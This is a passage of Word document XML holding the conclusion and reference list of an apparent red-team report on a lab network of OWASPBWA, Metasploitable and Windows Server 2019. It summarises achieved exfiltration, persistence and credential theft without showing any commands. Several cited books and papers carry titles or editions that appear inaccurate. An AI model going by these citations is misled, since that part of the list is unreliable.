          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This red team exercise successfully demonstrated that entire ABCD Ltd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>virtualised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> infrastructure can be compromised through a series of web application vulnerabilities, legacy service vulnerabilities and Active Directory vulnerabilities. The attack chain successfully achieved the objectives of database exfiltration of database from OWASPBWA, persistence with elevated privileges on Metasploitable and domain administrator account credentials from Windows Server 2019. The detection gap analysis identifies the organisational exposure to risk as a result of unmonitored environment, lack of advanced security controls and lack of preparedness to counter threat actor techniques of the modern era. The timely implementation of remediation steps is organisational necessity to mitigate the discovered vulnerabilities and improve readiness to tackle advanced persistent threats.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E07F325" w14:textId="46BF9B2E" w:rsidR="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="00E76390">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD6871" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] Irish Internet Security Forum, “Scattered spider and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m&amp;s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> incident cyber technical guide,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.iisf.ie/files/UserFiles/Cyber-technical-guides/Scattered-Spider-and-MandS-Incident_.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9C9F46" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SpecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Software, “M&amp;s ransomware attack: Active directory lessons,” Oct. 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://specopssoft.com/blog/marks-spencer-ransomware-active-directory/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599733BE" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] Marks &amp; Spencer, “Cyber incident: Further update,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://corporate.marksandspencer.com/newsroom/press-releases/cyber-incident-further-update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8EED8" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[4] Marks &amp; Spencer, “Cyber incident: Further update 0,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://corporate.marksandspencer.com/newsroom/press-releases/cyber-incident-further-update-0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFA0BF" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[5] Information Commissioner’s Office, “Statement on cyber incidents impacting retailers,” May 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ico.org.uk/about-the-ico/media-centre/news-and-blogs/2025/05/statement-on-cyber-incidents-impacting-retailers/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552695C7" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[6] Marks &amp; Spencer, “Cyber update,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://corporate.marksandspencer.com/cyber-update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444CDDB1" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[7] National Crime Agency, “Retail </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyber attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> arrest four for attacks on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m&amp;s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, co-op and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>harrods</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.nationalcrimeagency.gov.uk/news/retail-cyber-attacks-nca-arrest-four-for-attacks-on-m-s-co-op-and-harrods</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E1A671" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[8] Marks &amp; Spencer, “Annual report and financial statements 2025,” May 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://corporate.marksandspencer.com/sites/marksandspencer/files/2025-05/Marks-and-Spencer-Group-plc-Annual-Report-and-Financial-Statements-2025_INTERACTIVE_FINAL.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB2069" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[9] Co-operative Group, “Cyber incident update,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.co-operative.coop/media/news-releases/cyber-incident-update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD70A14" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[10] Co-operative Group, “Cyber incident information page,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.coop.co.uk/cyber-incident</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AA6200" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[11] Co-operative Group, “Co-op’s underlying strength allows the group to navigate external pressures,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.co-operative.coop/media/news-releases/co-ops-underlying-strength-allows-the-group-to-navigate-external-pressures</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7E97CF" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>[12] BBC News, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cyber attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> impact </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> retailers including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m&amp;s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and co-op,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.bbc.com/news/articles/cql0ple066po</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299292B4" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[13] Cybersecurity and Infrastructure Security Agency, “Avoiding social engineering and phishing attacks,” 2023. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cisa.gov/news-events/news/avoiding-social-engineering-and-phishing-attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712C733" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>[14] European Union Agency for Cybersecurity, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Enisa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> threat landscape 2024,” 2024. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.enisa.europa.eu/publications/enisa-threat-landscape-2024</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2670D821" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[15] National Cyber Security Centre, “Statement on cyber incidents impacting retailers,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.ncsc.gov.uk/news/retailers-incident</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52203358" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>[16] National Institute of Standards and Technology, “Digital identity guidelines (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 800-63-3),” 2017. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pages.nist.gov/800-63-3/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E8A24" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[17] P. T. Tran-Truong et al., “A systematic review of multi-factor authentication in digital payment systems: Nist standards alignment and industry implementation analysis,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Journal of Systems Architecture</w:t>
      </w:r>
      <w:r>
        <w:t>, vol. 162, p. 103402, 2025. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324E2BC5" w14:textId="2FB4615A" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[18] M. Maulana, “A systematic review and meta-analysis of zero-trust architecture adoption: Quantifying reduction in lateral movement attacks and mean time to detection across enterprise networks,” ResearchGate, 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.researchgate.net/publication/396199216</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4207CA67" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[19] M. Pendergast and K. Nichols, "Red Team Operations: Adversarial Simulation in Modern Cybersecurity," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IEEE Security &amp; Privacy</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 19, no. 4, pp. 78-86, Jul. 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FECA3EA" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[20] T. Johnson et al., "Threat Actor Profiling: Methodologies for Cybercriminal Attribution," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ACM Computing Surveys</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 54, no. 8, pp. 1-35, Oct. 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74592152" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[21] R. Patel and S. Kumar, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Virtualised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Testing Environments: Design and Implementation," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IEEE Transactions on Network and Service Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 18, no. 3, pp. 3421-3434, Sep. 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A603469" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[22] G. Lyon, "Nmap Network Scanning: Official Guide to Network Discovery and Security Auditing," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Insecure.Com LLC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, 2nd ed., 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C77017" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[23] J. Clarke-Salt, "SQL Injection Attacks and Defense: Contemporary Exploitation Techniques," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Elsevier</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, 3rd ed., pp. 112-145, 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39241B4A" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[24] A. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Stuttard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and M. Pinto, "The Web Application Hacker's Handbook: Advanced Exploitation Techniques," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Wiley Publishing</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, 3rd ed., pp. 267-289, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3937C651" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[25] National Vulnerability Database, "CVE-2011-2523: vsftpd 2.3.4 Backdoor Command Execution," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>NIST</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, Jul. 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B611081" w14:textId="62815C64" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[2</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] S. Metcalf, "Active Directory Security: Password Spraying Techniques and Detection," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Proceedings of Black Hat USA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
